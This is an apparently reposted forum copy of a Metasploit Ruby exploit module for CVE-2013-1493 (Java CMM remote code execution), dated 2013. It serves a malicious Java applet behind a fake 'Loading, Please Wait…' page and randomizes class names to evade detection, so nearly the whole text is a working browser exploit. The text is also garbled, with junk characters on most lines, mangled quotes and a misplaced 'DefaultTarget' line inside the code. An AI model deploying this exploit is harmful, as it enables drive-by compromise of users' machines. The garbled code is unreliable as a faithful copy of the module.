##5 G% B/ Z+ m3 t8 P3 A
( `& J8 L' J* ?# This file is part of the Metasploit Framework and may be subject to, j) F" k: _* \+ Z/ D9 H: {4 Q
# redistribution and commercial restrictions. Please see the Metasploit; y0 Z* [) q0 }1 E7 _1 J3 E
# web site for more information on licensing and terms of use.
( N; P0 z" x0 h0 F# http://metasploit.com/
) @/ ^: G( @6 \6 O" ?' n, @8 D% |' E##
$ r4 G3 R* Z, Q/ @( g; F$ Erequire ‘msf/core’
) M$ X8 s, x* y/ m- u1 Z" hrequire ‘rex’
- ]: W- G' H* N$ ?7 Kclass Metasploit3 < Msf::Exploit::Remote2 l; s0 v5 t& d Y- x
Rank = NormalRanking
' Z9 j( l: }) e; j2 C. S: s; o, Kinclude Msf::Exploit::Remote::HttpServer::HTML
( h7 p7 i0 v' Y" Ainclude Msf::Exploit::EXE2 D1 b4 p6 H- i* ?
include Msf::Exploit::Remote::BrowserAutopwn
5 h( S* M0 T2 D& o5 u( aautopwn_info({ :javascript => false }): {8 [. x: C m# _! n
def initialize( info = {} )$ O# K6 ~4 Z# Y. v
super( update_info( info,5 c0 T' M& X. e" T* ?# q5 U
‘Name’ => ‘Java CMM Remote Code Execution’,! K: y A: F6 G6 m
‘Description’ => %q{) F# A5 ], I v
This module abuses the Color Management classes from a Java Applet to run
& ^0 J* p. `3 P* iarbitrary Java code outside of the sandbox as exploited in the wild in February4 Y' g- r% h6 X+ J1 @; {
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
3 _0 ?" Z* J. Dand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
1 v; t) l5 }; ~2 _! }# Dsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java0 ^8 y5 v7 ]) W& [
warning in order to run the malicious applet.0 O2 l. A/ l8 t t
},
3 Y' X( F4 _7 g) J# {‘License’ => MSF_LICENSE,: J- }) t% r: t y
‘Author’ =>
+ p. m, w% U+ z& `'Unknown', # Vulnerability discovery and Exploit
8 D" h9 c) l7 x: O'juan vazquez' # Metasploit module (just ported the published exploit)/ t E& o1 Z& \/ x9 f1 J
],
9 p+ m$ ?8 F t$ `‘References’ =>9 Z& y" {8 ?# d* \5 j1 m" E; y
[
( ?% L- _) x ] ]+ N2 _: U[ 'CVE', '2013-1493' ],9 y% ^% o: r8 b6 u0 _
[ 'OSVDB', '90737' ],* N; U6 \( m$ A
[ 'BID', '58238' ],/ a/ C S4 T4 N& \7 ]; J
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
5 k" F1 m1 C# a1 v3 f/ B. T7 Z[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
/ G- S" L& o$ o, Z+ `[ 'URL', 'http://pastie.org/pastes/6581034' ]2 s' p+ x2 c# i* D
],
9 N0 b5 @/ D6 U/ s5 ~6 T& M6 w‘Platform’ => [ 'win', 'java' ],
# H% d+ O8 |8 y2 N8 h‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
% C) v2 Y8 d8 F0 [" M# Z‘Targets’ =>3 ^! ~1 n% M" }; b0 F$ R
[% z) Z( k/ b% d* L' u( V
[ 'Generic (Java Payload)'," m0 a( v% y3 s$ S
{
# b: O- R5 d+ G8 C7 n9 @'Platform' => 'java',
- g) Y& V( U# ]$ Y! Q2 D- n'Arch' => ARCH_JAVA5 t* ]. L. F/ ?0 s
}
k1 K j4 T1 G* P; F/ z],
5 }2 ?. l* ?+ A+ s) D4 S[ 'Windows x86 (Native Payload)',
* I. H* q3 ]; H# {{( h: p5 H7 A* v2 E2 o3 q6 j7 L2 D
'Platform' => 'win',
3 s; H: w" W& l% D8 s& }9 _'Arch' => ARCH_X86/ M" w& u5 o/ Y# J0 N
}6 b3 C/ e' f9 S0 p i
]
( ~7 J, k- Q8 {" e! o- Z],
% f1 Y7 Z% @: m! ]- q‘‘DisclosureDate’ => ‘Mar 01 2013′4 \, z5 }0 ]3 L
)). ~3 h1 ]- g$ w6 p+ @0 x* ^0 ?" _9 ]
end
& H6 V! }& v- S# ]# Rdef setup
% }" Z- v" W. o8 U, M9 t. |path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
8 O' i! ]. T( V; u( W& q' Y@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }# e1 L) T6 j, f8 k+ I- a
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”). y# X. {6 D( W
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
) Q# n9 K2 z8 [$ |3 b( Upath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”), t; x0 c: j7 i" ?+ P
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
- D# n* J- {. ]) K9 K, cpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
5 h2 q6 K: D8 W: l* ^3 c& d@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
$ s" w) i# W+ P% k- [6 L# g# d@init_class_name = rand_text_alpha(“Init”.length)
- U& y+ M3 n' ?5 R8 f5 r; M@init_class.gsub!(“Init”, @init_class_name)/ g+ U4 a: T" q" ^$ Q
super
+ `5 h# u7 O* m3 u: \end
- T6 [. X& P: S5 B$ r) vdef on_request_uri(cli, request)' e8 x+ I. I9 }/ b1 |+ M
print_status(“handling request for #{request.uri}”)5 N0 N# c9 Q" g' J+ r- W- q
case request.uri
. L2 ]8 Y% G6 Jwhen /\.jar$/i0 q( _6 Z1 M, H6 m# ~4 P2 H
jar = payload.encoded_jar( E0 b' e7 u$ z- d7 m
jar.add_file(“#{@init_class_name}.class”, @init_class)& G1 E1 O. ]+ \/ `
jar.add_file(“Leak.class”, @leak_class)
9 r4 ~, F) J& ^! [jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
# V+ v ^6 L' [- C- Cjar.add_file(“MyColorSpace.class”, @color_space_class)& @% e4 T8 d0 R% d( C8 ` `& b
DefaultTarget’ => 1,. }, j8 v, X; Q5 q- f6 p1 i; I$ b2 H- o* _8 ]
metasploit_str = rand_text_alpha(“metasploit”.length)8 n0 j4 J1 ^0 I5 L
payload_str = rand_text_alpha(“payload”.length)
" e; c0 {& f# ejar.entries.each { |entry|3 A _# V3 U6 o9 N4 l% X8 |
entry.name.gsub!(“metasploit”, metasploit_str)5 u! b" t3 f6 h
entry.name.gsub!(“Payload”, payload_str)
& r* u* W# m! L* y: h5 fentry.data = entry.data.gsub(“metasploit”, metasploit_str)* D5 ~* t3 p. H
entry.data = entry.data.gsub(“Payload”, payload_str) \3 K- l' i# f# g5 W
}7 G! U& r! e* @7 ]; E+ D/ V
jar.build_manifest+ h3 \# R* `! F/ C; y
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
5 l2 X7 Q3 ]1 f" Y5 z* bwhen /\/$/
* Q1 R5 s! e5 ^- R) M9 I3 opayload = regenerate_payload(cli)
9 K% G& C, r+ B$ Pif not payload' n% F; D) e1 [' F, |! Y
print_error(“Failed to generate the payload.”)
' \, _% Q6 h0 Z7 H+ Osend_not_found(cli)/ B0 a/ i- [- a: s% @- _# X! @
return
2 w U1 I, g3 N+ M6 R1 o. |3 Dend
* @$ z4 U# d7 v0 _0 q0 k; v2 y- Usend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
: e' Z E5 n( p: ]else
$ c. D5 `5 q' h2 r; [% r5 ?+ g( ssend_redirect(cli, get_resource() + ‘/’, ”)8 `/ j8 n3 t, G- o! t9 w% Z
end( p; {( c" m/ y9 X
end+ ?# O& W; C4 K
def generate_html* |& x" g$ z9 o- j9 C: P
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
6 W$ ^/ {) R- U, n; L! Thtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
1 J; T0 S$ F6 `: S8 I: Uhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
" U6 U% G% k$ M% q6 Z' Khtml += %Q|</applet></body></html>|
4 Y6 E2 h0 k5 B; | u/ P$ Nreturn html9 u- ]- u) D5 R8 ~/ k
end% ?6 x- n; ^$ O* F
end0 v& ], y' d; X9 ]' p. o ]% q
end
8 p! E2 P4 E' ?, h |
发表于 2013-4-4 17:31:17
收藏
支持
反对